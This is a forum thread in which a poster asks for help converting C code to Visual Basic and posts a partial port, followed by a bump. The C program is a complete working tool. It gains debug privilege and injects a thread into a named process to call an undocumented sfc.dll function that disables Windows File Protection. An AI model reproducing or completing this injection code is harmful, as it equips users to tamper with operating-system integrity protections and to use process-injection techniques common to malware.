Results 1 to 2 of 2

Thread: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)

  1. #1

    Thread Starter
    Lively Member
    Join Date
    May 2004
    Location
    Home
    Posts
    85

    Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)

    I am trying to convert some code from C to VB but the memory API functions really confuse me.


    Here is the code:

    Code:
    -----  dwfp2.cpp
    #define WIN32_LEAN_AND_MEAN
    #define STRICT
    
    #include <windows.h>
    #include <tchar.h>
    #include <stdio.h>
    #include <tlhelp32.h>
    
    
    #pragma check_stack (off)
    DWORD exec_func(FARPROC SfcTerminateWatcherThread)
    {
       SfcTerminateWatcherThread();
       return 0;
    }
    void after_thread_func(void){}
    #pragma check_stack 
    
    
    int adjust_privileges(void);
    DWORD get_process_pid(char *);
    int inject_thread(DWORD, LPVOID);
    
    
    int main(int argc, char *argv[])
    {
        if(argc < 2){
            printf("%s [process name]\n", argv[0]);
            return 1;
        }
    
        FARPROC pSTWT = GetProcAddress(LoadLibrary("sfc.dll"), (LPCSTR)2);
        if(pSTWT == NULL){
            printf("Error: SfcTerminateWatcherThread\n");
            return -1;
        }
        
        int err = 0;
        if(err = adjust_privileges()){
            printf("Error: adjust_privileges:%d\n", err);
            return -1;
        }
        
        DWORD dwPID;
        if((dwPID = get_process_pid(argv[1])) == 0){
            printf("Error: get_process_pid\n");
            return -1;
        }
        
        if(err = inject_thread(dwPID, pSTWT)){
            printf("Error: inject_thread:%d\n", err);
            return -1;
        }
        
        printf("Windows File Protection Disabled.\n");
        return 0;
    }
    
    
    int adjust_privileges(void)
    {
        int ret = 0;
        HANDLE hToken = NULL;
    
        try{
            if( ! OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
                throw 1;
                
            LUID luid;
            if( ! LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid))
                throw 2;
                
            TOKEN_PRIVILEGES tk_priv;
            tk_priv.PrivilegeCount = 1;
            tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            tk_priv.Privileges[0].Luid = luid;
            
            if( ! AdjustTokenPrivileges(hToken, FALSE, &tk_priv, 0, NULL, NULL))
                throw 3;
    
        }catch(int err){
            ret = err;
        }
    
        CloseHandle(hToken);
        return ret;
    }
    
    
    DWORD get_process_pid(char *psname)
    {
        DWORD pid = 0;
    
        HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hSnap == INVALID_HANDLE_VALUE)
            return 0;
    
        PROCESSENTRY32 pe;
        pe.dwSize = sizeof(pe);
    
        BOOL bResult = Process32First(hSnap, &pe);
        while(bResult){
            if( ! strcmp(pe.szExeFile, psname))
                pid = pe.th32ProcessID;
            bResult = Process32Next(hSnap, &pe);
        }
        
        CloseHandle(hSnap);
        return pid;
    }
    
    
    int inject_thread(DWORD dwPID, LPVOID pfunc)
    {
        int ret = 0;
        
        HANDLE hProcess = NULL;
        LPVOID remote_mem = NULL;
    
        try{
            if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) == NULL)
                throw 1;
            
            remote_mem = VirtualAllocEx(hProcess, NULL, 
                (SIZE_T)((char *)after_thread_func - (char *)exec_func),
                MEM_COMMIT, PAGE_READWRITE);
            if(remote_mem == NULL)
                throw 2;
            
            BOOL wFlag = WriteProcessMemory(hProcess, remote_mem, (char *)exec_func,
                (SIZE_T)((char *)after_thread_func - (char *)exec_func), (SIZE_T *)0);
            if(wFlag == FALSE)
                throw 3;
            
            HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 
            (LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
            if(hThread == NULL)
                throw 4;
                
            if(WaitForSingleObject(hThread, 10 * 1000) == WAIT_TIMEOUT)
                throw 5;
                
            CloseHandle(hThread);
            
        }catch(int err){
            if(err > 2)
                VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
            ret = err;
        }
        
        CloseHandle(hProcess);
        return ret;
    }
    -----


    Here is what I have so far:
    (I stopped at the VirtualAllocEx b/c I am not sure what this means: (SIZE_T)((char *)after_thread_func - (char *)exec_func) )
    Code:
    Public Sub InjectCode2()
    
        Dim pSFCModule As Long
        Dim pSTWT As Long       'SfcTerminateWatcherThread
        
        Dim pDataRemote As Long
        Dim lSize As Long
        
        'Get Handles:
        pSFCModule = LoadLibrary("sfc.dll")
        pSTWT = GetProcAddress2(pSFCModule, 2)
            MsgBox pSTWT
            
        'Enable Debug privilege
        Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
        
        'Open Process:
        Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, lPID)
            MsgBox hProcess
        
        
        pDataRemote = VirtualAllocEx(hProcess, 0, lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        
    
    
    End Sub

  2. #2

    Thread Starter
    Lively Member
    Join Date
    May 2004
    Location
    Home
    Posts
    85

    Re: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread

    *Bump*

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width